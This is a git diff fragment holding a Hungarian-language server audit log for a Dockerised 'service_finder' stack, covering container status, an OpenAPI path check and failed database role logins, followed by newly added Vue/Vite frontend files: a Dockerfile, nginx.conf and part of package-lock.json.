/api/v2/openapi.json + +/ → HTTP 200 OK, JSON: + +{"status":"online","version":"2.0.0", ...} (a kimenet vége levágva a pasted szövegben) + +Következtetés: + +Az API nem a default FastAPI openapi útvonalon adja a specifikációt, hanem verziózott path-on: /api/v2/openapi.json. + +Emiatt a korábbi curl .../openapi.json mentés teljesen korrekt módon 404-et mentett le. + +LOG-2026-01-30-006 — Fájlrendszer snapshot /opt/service_finder + +Parancsok: + +ls -lah + +find . -maxdepth 3 -type f -name "docker-compose*.yml" -o -name ".env" -o -name "*.env" | sed 's|^\./||' + +du -h -d 2 | sort -h | tail -n 30 + +ls -lah logs || true + +Kulcs megállapítások: + +van .env (2026-01-30 01:47), docker-compose.yml (2026-01-29 22:03) + +van backend/, frontend/, migrations/ + +api_spec.json jelen van (22 byte) + +vannak backup scriptek: backup_manager.sh, backup_to_nas.sh + +logs/ mappa létezik, de üres (csak könyvtár) + +jogosultsági hibák: postgres_data, .vscode_config/.ssh, pgadmin storage, proxy-manager letsencrypt könyvtárak + +Kockázat / megjegyzés: + +postgres_data olvasása “Permission denied” → tipikus container volume ownership issue (nem baj, csak kezelni kell sudo-val). + +A compose configban látszó code-server PASSWORD kikerült a paste-be → ezt érdemes azonnal cserélni (lásd lent). + +LOG-2026-01-30-007 — Compose render + szolgáltatások állapota + log export + +Parancsok: + +docker compose config > /tmp/service_finder.compose.rendered.yml + +docker compose ps + +log exportok /tmp/*_last200.log + +Eredmény: + +Minden releváns szolgáltatás Up: api, frontend, postgres (healthy), redis, minio, npm, pgadmin, code-server, dozzle + +Figyelmeztetés: VERSION_CODENAME env nincs beállítva → nem kritikus, de jelzi hogy a compose templated env-et vár. + +LOG-2026-01-30-008 — DB elérés: “postgres” role nem létezik + +Parancsok: + +docker exec -it postgres-db psql -U postgres -c "\l" + +docker exec -it postgres-db psql -U postgres -c "\du" + +docker exec -it postgres-db psql -U postgres -c "\dx" + +docker exec -it postgres-db psql -U postgres -c "\dn" + +Eredmény: + +mindegyik: FATAL: role "postgres" does not exist + +Következtetés: + +A konténer nem default POSTGRES_USER=postgres-szal lett inicializálva, hanem más admin userrel (pl. admin, db_owner, stb.). + +Ez teljesen OK, csak a -U postgres helyett a valós DB user kell. + + +TELJES LOG — 2026-01-30 +LOG-2026-01-30-001 — Docker konténerek állapota (docker ps) + +Kontekstus: service_finder stack futása ellenőrzés +Parancs: + +docker ps +Eredmény (kivonat): + +service_finder_frontend — port: 0.0.0.0:3000->80/tcp + +service_finder_api — port: 0.0.0.0:8000->8000/tcp + +postgres-db — image: postgres:15 — port: 0.0.0.0:5432->5432/tcp — healthy + +service_finder_redis — image: redis:alpine — port: 6379/tcp + +service_finder_minio — port: 0.0.0.0:9000-9001->9000-9001/tcp + +nginx-proxy-manager — port: 80-81,443 + +pgadmin_ui — port: 0.0.0.0:5050->80/tcp + +code-server — port: 0.0.0.0:8443->8080/tcp + +dozzle — port: 0.0.0.0:8888->8080/tcp + +ddclient — fut +Megjegyzés / kockázat: + +A postgres-db publikusan ki van téve 0.0.0.0:5432-n. (Ezt a későbbi hardeningnél érdemes minimum LAN/VPN-re szűkíteni.) + +LOG-2026-01-30-002 — Docker compose stack-ek listája (docker compose ls) + +Parancs: + +docker compose ls +Eredmény: + +ddclient — running(1) — /opt/ddclient/docker-compose.yml + +service_finder — running(9) — /opt/service_finder/docker-compose.yml + +LOG-2026-01-30-003 — Docker compose szolgáltatások állapota (docker compose ps) + +Parancs: + +docker compose ps +Eredmény (kivonat): + +postgres-db — Up (healthy) + +service_finder_api — Up + +service_finder_frontend — Up + +service_finder_redis — Up + +service_finder_minio — Up + +nginx-proxy-manager — Up + +pgadmin_ui — Up + +code-server — Up + +dozzle — Up +Megjegyzés: + +A “2 docker konténer” megfogalmazás helyett itt 2 compose projekt van (ddclient + service_finder), és azon belül több konténer fut. + +LOG-2026-01-30-004 — OpenAPI specifikáció kimentése (curl openapi.json) + +Kontekstus: API elérhetőségének és OpenAPI dokumentációjának ellenőrzése +Parancs: + +curl http://127.0.0.1:8000/openapi.json > api_spec.json +Eredmény: + +Letöltött méret: 22 byte +Megjegyzés / következtetés: + +A 22 byte nagyon gyanús (egy FastAPI OpenAPI JSON tipikusan több KB/MB). Ez majdnem biztosan azt jelenti, hogy nem a várt OpenAPI JSON jött vissza (pl. “Not Found”, “Unauthorized”, reverse proxy válasz, vagy hibaszöveg). + +Következő lépés: a fájl tartalmát ki kell olvasni (wc -c api_spec.json && cat api_spec.json), és/vagy headerekkel kérni (curl -i ...). + +TELJES LOG — 2026-01-30 +LOG-2026-01-30-001 — Docker konténerek állapota (docker ps) + +Kontekstus: service_finder stack futása ellenőrzés +Parancs: + +docker ps +Eredmény (kivonat): + +service_finder_frontend — port: 0.0.0.0:3000->80/tcp + +service_finder_api — port: 0.0.0.0:8000->8000/tcp + +postgres-db — image: postgres:15 — port: 0.0.0.0:5432->5432/tcp — healthy + +service_finder_redis — image: redis:alpine — port: 6379/tcp + +service_finder_minio — port: 0.0.0.0:9000-9001->9000-9001/tcp + +nginx-proxy-manager — port: 80-81,443 + +pgadmin_ui — port: 0.0.0.0:5050->80/tcp + +code-server — port: 0.0.0.0:8443->8080/tcp + +dozzle — port: 0.0.0.0:8888->8080/tcp + +ddclient — fut +Megjegyzés / kockázat: + +A postgres-db publikusan ki van téve 0.0.0.0:5432-n. (Ezt a későbbi hardeningnél érdemes minimum LAN/VPN-re szűkíteni.) + +LOG-2026-01-30-002 — Docker compose stack-ek listája (docker compose ls) + +Parancs: + +docker compose ls +Eredmény: + +ddclient — running(1) — /opt/ddclient/docker-compose.yml + +service_finder — running(9) — /opt/service_finder/docker-compose.yml + +LOG-2026-01-30-003 — Docker compose szolgáltatások állapota (docker compose ps) + +Parancs: + +docker compose ps +Eredmény (kivonat): + +postgres-db — Up (healthy) + +service_finder_api — Up + +service_finder_frontend — Up + +service_finder_redis — Up + +service_finder_minio — Up + +nginx-proxy-manager — Up + +pgadmin_ui — Up + +code-server — Up + +dozzle — Up +Megjegyzés: + +A “2 docker konténer” megfogalmazás helyett itt 2 compose projekt van (ddclient + service_finder), és azon belül több konténer fut. + +LOG-2026-01-30-004 — OpenAPI specifikáció kimentése (curl openapi.json) + +Kontekstus: API elérhetőségének és OpenAPI dokumentációjának ellenőrzése +Parancs: + +curl http://127.0.0.1:8000/openapi.json > api_spec.json +Eredmény: + +Letöltött méret: 22 byte +Megjegyzés / következtetés: + +A 22 byte nagyon gyanús (egy FastAPI OpenAPI JSON tipikusan több KB/MB). Ez majdnem biztosan azt jelenti, hogy nem a várt OpenAPI JSON jött vissza (pl. “Not Found”, “Unauthorized”, reverse proxy válasz, vagy hibaszöveg). + +Következő lépés: a fájl tartalmát ki kell olvasni (wc -c api_spec.json && cat api_spec.json), és/vagy headerekkel kérni (curl -i ...). + +IDŐVONAL — 2026-01-30 + +Időpontok: a parancsokhoz konkrét óra:perc nem volt rögzítve a másolatban, ezért sorrendi idővonalat adok (ez stabil, később időbélyeggel pontosítható). + +Docker futó konténerek ellenőrzése (docker ps) + +Compose projektek listázása (docker compose ls) + +Compose szolgáltatások állapotának listázása (docker compose ps) + +OpenAPI export kísérlet (curl .../openapi.json > api_spec.json) → 22 byte-os eredmény, anomália + +RENDSZERFELTÁRÁS — mi kész, mi nincs kész (jelen bizonyítékok alapján) +Ami biztosan kész / működik + +Alaprendszer Compose-ban fut: service_finder stack “running(9)”. + +Frontend él: port 3000 publikusan kint. + +API él: port 8000 publikusan kint. + +Postgres él és healthy: postgres:15, publikus 5432. + +Redis él. + +MinIO él. + +Admin eszközök élnek: pgAdmin (5050), NPM (80/81/443), Dozzle (8888), code-server (8443). + +Létezik lokális projekt struktúra és volume-ok: /opt/service_finder/... alatt backend, frontend, logs, migrations, postgres_data, redis data, proxy-manager adatok. + +filesystem_map + +Ami valószínűleg nincs kész / hibás / tisztázandó + +OpenAPI endpoint: a mentett fájlméret alapján nem jó választ ad az /openapi.json (vagy nem ott van, vagy proxy/route gond). + +Biztonsági hardening: Postgres jelenleg 0.0.0.0:5432-n lóg (ez később sürgős). + +Migrációs konzisztencia: van migrations struktúra a fájlrendszerben (több helyen is), de nem tudjuk, hogy DB-séma ténylegesen “head”-en van-e. + +filesystem_map + +FÁJLRENDSZER-HELYZETKÉP (amit már látunk) + +A feltöltött map alapján a fontos csomópontok: + +Projekt gyökér: /opt/service_finder + +filesystem_map + +Backend kód: /opt/service_finder/backend (+ app/, models/, auth/, schemas/, templates/, migrations/versions) + +filesystem_map + +Frontend kód: /opt/service_finder/frontend (+ src/views/admin, router, stores, services, components, public, node_modules) + +filesystem_map + +Log könyvtár: /opt/service_finder/logs + +filesystem_map + +Postgres adatok: /opt/service_finder/postgres_data/... (és van egy /opt/service_finder/postgres/data/... jellegű ág is) + +filesystem_map + +Redis data: /opt/service_finder/redis/data/... + +filesystem_map + +NPM/Proxy manager adatok + LE: /opt/service_finder/proxy-manager/... + +filesystem_map + +Megjegyzés: a map alapján mintha két postgres adatútvonal is jelen lenne: postgres/data és postgres_data. Ezt tisztázni kell, nehogy két külön volume/útvonal keveredjen (backup, restore, space, stb.). + +filesystem_map + +ADATBÁZIS-HELYZETKÉP (a feltöltött táblalistád alapján) + +A feltöltött tablak_2026.01.30_0.csv alapján a data sémában 54 tábla van. (Ezt használom alapnak a DB audit lépések priorizálásához.) + +A következő lépésben ebből fogok csinálni: + +“core domain” csoportosítást (org/account/auth/vehicle/provider/request/evidence/stb.), + +és egy “migráció és integráció” ellenőrző checklistet (táblák + FK + index + RLS jelek). \ No newline at end of file diff --git a/frontend/.gitignore b/frontend/.gitignore new file mode 100755 index 0000000..a547bf3 --- /dev/null +++ b/frontend/.gitignore @@ -0,0 +1,24 @@ +# Logs +logs +*.log +npm-debug.log* +yarn-debug.log* +yarn-error.log* +pnpm-debug.log* +lerna-debug.log* + +node_modules +dist +dist-ssr +*.local + +# Editor directories and files +.vscode/* +!.vscode/extensions.json +.idea +.DS_Store +*.suo +*.ntvs* +*.njsproj +*.sln +*.sw? diff --git a/frontend/.vscode/extensions.json b/frontend/.vscode/extensions.json new file mode 100755 index 0000000..a7cea0b --- /dev/null +++ b/frontend/.vscode/extensions.json @@ -0,0 +1,3 @@ +{ + "recommendations": ["Vue.volar"] +} diff --git a/frontend/Dockerfile b/frontend/Dockerfile new file mode 100755 index 0000000..65a7d71 --- /dev/null +++ b/frontend/Dockerfile @@ -0,0 +1,22 @@ +# 1. szakasz: Build (lefordítja a kódot) +FROM node:20-slim as build-stage +WORKDIR /app +COPY package*.json ./ +RUN npm install +COPY . . +RUN npm run build + +# 2. szakasz: Kiszolgálás (Nginx) +FROM nginx:stable-alpine as production-stage +COPY --from=build-stage /app/dist /usr/share/nginx/html +# Nginx konfiguráció, hogy kezelje a Vue router-t +RUN echo 'server { \ + listen 80; \ + location / { \ + root /usr/share/nginx/html; \ + index index.html; \ + try_files $uri $uri/ /index.html; \ + } \ +}' > /etc/nginx/conf.d/default.conf +EXPOSE 80 +CMD ["nginx", "-g", "daemon off;"] \ No newline at end of file diff --git a/frontend/README.md b/frontend/README.md new file mode 100755 index 0000000..1511959 --- /dev/null +++ b/frontend/README.md @@ -0,0 +1,5 @@ +# Vue 3 + Vite + +This template should help get you started developing with Vue 3 in Vite. The template uses Vue 3 ` + + diff --git a/frontend/nginx.conf b/frontend/nginx.conf new file mode 100755 index 0000000..4e96dc5 --- /dev/null +++ b/frontend/nginx.conf @@ -0,0 +1,29 @@ +worker_processes 4; # Itt korlátozzuk a 108 helyett! + +events { + worker_connections 1024; +} + +http { + include /etc/nginx/mime.types; + default_type application/octet-stream; + + server { + listen 80; + server_name localhost; + + root /usr/share/nginx/html; # Itt keresi a fájlokat + index index.html; + + location / { + try_files $uri $uri/ /index.html; # SPA (Vue/React) támogatás + } + + # API kérések továbbküldése a backendnek (opcionális, ha a frontend kéri) + location /api/ { + proxy_pass http://service_finder_api:8000/; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + } + } +} \ No newline at end of file diff --git a/frontend/package-lock.json b/frontend/package-lock.json new file mode 100755 index 0000000..44849b5 --- /dev/null +++ b/frontend/package-lock.json @@ -0,0 +1,2971 @@ +{ + "name": "frontend", + "version": "0.0.0", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "frontend", + "version": "0.0.0", + "dependencies": { + "@tailwindcss/postcss": "^4.1.18", + "axios": "^1.13.4", + "chart.js": "^4.5.1", + "pinia": "^3.0.4", + "vue": "^3.5.24", + "vue-chartjs": "^5.3.3", + "vue-router": "^5.0.0" + }, + "devDependencies": { + "@vitejs/plugin-vue": "^6.0.1", + "autoprefixer": "^10.4.23", + "postcss": "^8.5.6", + "tailwindcss": "^4.1.18", + "vite": "^7.2.4" + } + }, + "node_modules/@alloc/quick-lru": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz", + "integrity": "sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==", + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@babel/generator": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.28.6.tgz", + "integrity": "sha512-lOoVRwADj8hjf7al89tvQ2a1lf53Z+7tiXMgpZJL3maQPDxh0DgLMN62B2MKUOFcoodBHLMbDM6WAbKgNy5Suw==", + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.28.6", + "@babel/types": "^7.28.6", + "@jridgewell/gen-mapping": "^0.3.12", + "@jridgewell/trace-mapping": "^0.3.28", + "jsesc": "^3.0.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-string-parser": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.28.5", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.28.5.tgz", + "integrity": "sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/parser": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.28.6.tgz", + "integrity": "sha512-TeR9zWR18BvbfPmGbLampPMW+uW1NZnJlRuuHso8i87QZNq2JRF9i6RgxRqtEq+wQGsS19NNTWr2duhnE49mfQ==", + "license": "MIT", + "dependencies": { + "@babel/types": "^7.28.6" + }, + "bin": { + "parser": "bin/babel-parser.js" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@babel/types": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.28.6.tgz", + "integrity": "sha512-0ZrskXVEHSWIqZM/sQZ4EV3jZJXRkio/WCxaqKZP1g//CEWEPSfeZFcms4XeKBCHU0ZKnIkdJeU/kF+eRp5lBg==", + "license": "MIT", + "dependencies": { + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.28.5" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.27.2.tgz", + "integrity": "sha512-GZMB+a0mOMZs4MpDbj8RJp4cw+w1WV5NYD6xzgvzUJ5Ek2jerwfO2eADyI6ExDSUED+1X8aMbegahsJi+8mgpw==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.27.2.tgz", + "integrity": "sha512-DVNI8jlPa7Ujbr1yjU2PfUSRtAUZPG9I1RwW4F4xFB1Imiu2on0ADiI/c3td+KmDtVKNbi+nffGDQMfcIMkwIA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.27.2.tgz", + "integrity": "sha512-pvz8ZZ7ot/RBphf8fv60ljmaoydPU12VuXHImtAs0XhLLw+EXBi2BLe3OYSBslR4rryHvweW5gmkKFwTiFy6KA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.27.2.tgz", + "integrity": "sha512-z8Ank4Byh4TJJOh4wpz8g2vDy75zFL0TlZlkUkEwYXuPSgX8yzep596n6mT7905kA9uHZsf/o2OJZubl2l3M7A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.27.2.tgz", + "integrity": "sha512-davCD2Zc80nzDVRwXTcQP/28fiJbcOwvdolL0sOiOsbwBa72kegmVU0Wrh1MYrbuCL98Omp5dVhQFWRKR2ZAlg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.27.2.tgz", + "integrity": "sha512-ZxtijOmlQCBWGwbVmwOF/UCzuGIbUkqB1faQRf5akQmxRJ1ujusWsb3CVfk/9iZKr2L5SMU5wPBi1UWbvL+VQA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.27.2.tgz", + "integrity": "sha512-lS/9CN+rgqQ9czogxlMcBMGd+l8Q3Nj1MFQwBZJyoEKI50XGxwuzznYdwcav6lpOGv5BqaZXqvBSiB/kJ5op+g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.27.2.tgz", + "integrity": "sha512-tAfqtNYb4YgPnJlEFu4c212HYjQWSO/w/h/lQaBK7RbwGIkBOuNKQI9tqWzx7Wtp7bTPaGC6MJvWI608P3wXYA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.27.2.tgz", + "integrity": "sha512-vWfq4GaIMP9AIe4yj1ZUW18RDhx6EPQKjwe7n8BbIecFtCQG4CfHGaHuh7fdfq+y3LIA2vGS/o9ZBGVxIDi9hw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.27.2.tgz", + "integrity": "sha512-hYxN8pr66NsCCiRFkHUAsxylNOcAQaxSSkHMMjcpx0si13t1LHFphxJZUiGwojB1a/Hd5OiPIqDdXONia6bhTw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.27.2.tgz", + "integrity": "sha512-MJt5BRRSScPDwG2hLelYhAAKh9imjHK5+NE/tvnRLbIqUWa+0E9N4WNMjmp/kXXPHZGqPLxggwVhz7QP8CTR8w==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.27.2.tgz", + "integrity": "sha512-lugyF1atnAT463aO6KPshVCJK5NgRnU4yb3FUumyVz+cGvZbontBgzeGFO1nF+dPueHD367a2ZXe1NtUkAjOtg==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.27.2.tgz", + "integrity": "sha512-nlP2I6ArEBewvJ2gjrrkESEZkB5mIoaTswuqNFRv/WYd+ATtUpe9Y09RnJvgvdag7he0OWgEZWhviS1OTOKixw==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.27.2.tgz", + "integrity": "sha512-C92gnpey7tUQONqg1n6dKVbx3vphKtTHJaNG2Ok9lGwbZil6DrfyecMsp9CrmXGQJmZ7iiVXvvZH6Ml5hL6XdQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.27.2.tgz", + "integrity": "sha512-B5BOmojNtUyN8AXlK0QJyvjEZkWwy/FKvakkTDCziX95AowLZKR6aCDhG7LeF7uMCXEJqwa8Bejz5LTPYm8AvA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.27.2.tgz", + "integrity": "sha512-p4bm9+wsPwup5Z8f4EpfN63qNagQ47Ua2znaqGH6bqLlmJ4bx97Y9JdqxgGZ6Y8xVTixUnEkoKSHcpRlDnNr5w==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.27.2.tgz", + "integrity": "sha512-uwp2Tip5aPmH+NRUwTcfLb+W32WXjpFejTIOWZFw/v7/KnpCDKG66u4DLcurQpiYTiYwQ9B7KOeMJvLCu/OvbA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.27.2.tgz", + "integrity": "sha512-Kj6DiBlwXrPsCRDeRvGAUb/LNrBASrfqAIok+xB0LxK8CHqxZ037viF13ugfsIpePH93mX7xfJp97cyDuTZ3cw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.27.2.tgz", + "integrity": "sha512-HwGDZ0VLVBY3Y+Nw0JexZy9o/nUAWq9MlV7cahpaXKW6TOzfVno3y3/M8Ga8u8Yr7GldLOov27xiCnqRZf0tCA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.27.2.tgz", + "integrity": "sha512-DNIHH2BPQ5551A7oSHD0CKbwIA/Ox7+78/AWkbS5QoRzaqlev2uFayfSxq68EkonB+IKjiuxBFoV8ESJy8bOHA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.27.2.tgz", + "integrity": "sha512-/it7w9Nb7+0KFIzjalNJVR5bOzA9Vay+yIPLVHfIQYG/j+j9VTH84aNB8ExGKPU4AzfaEvN9/V4HV+F+vo8OEg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openharmony-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.27.2.tgz", + "integrity": "sha512-LRBbCmiU51IXfeXk59csuX/aSaToeG7w48nMwA6049Y4J4+VbWALAuXcs+qcD04rHDuSCSRKdmY63sruDS5qag==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.27.2.tgz", + "integrity": "sha512-kMtx1yqJHTmqaqHPAzKCAkDaKsffmXkPHThSfRwZGyuqyIeBvf08KSsYXl+abf5HDAPMJIPnbBfXvP2ZC2TfHg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.27.2.tgz", + "integrity": "sha512-Yaf78O/B3Kkh+nKABUF++bvJv5Ijoy9AN1ww904rOXZFLWVc5OLOfL56W+C8F9xn5JQZa3UX6m+IktJnIb1Jjg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.27.2.tgz", + "integrity": "sha512-Iuws0kxo4yusk7sw70Xa2E2imZU5HoixzxfGCdxwBdhiDgt9vX9VUCBhqcwY7/uh//78A1hMkkROMJq9l27oLQ==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.27.2.tgz", + "integrity": "sha512-sRdU18mcKf7F+YgheI/zGf5alZatMUTKj/jNS6l744f9u3WFu4v7twcUI9vu4mknF4Y9aDlblIie0IM+5xxaqQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.13", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", + "integrity": "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==", + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/remapping": { + "version": "2.3.5", + "resolved": "https://registry.npmjs.org/@jridgewell/remapping/-/remapping-2.3.5.tgz", + "integrity": "sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ==", + "license": "MIT", + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.24" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.2", + 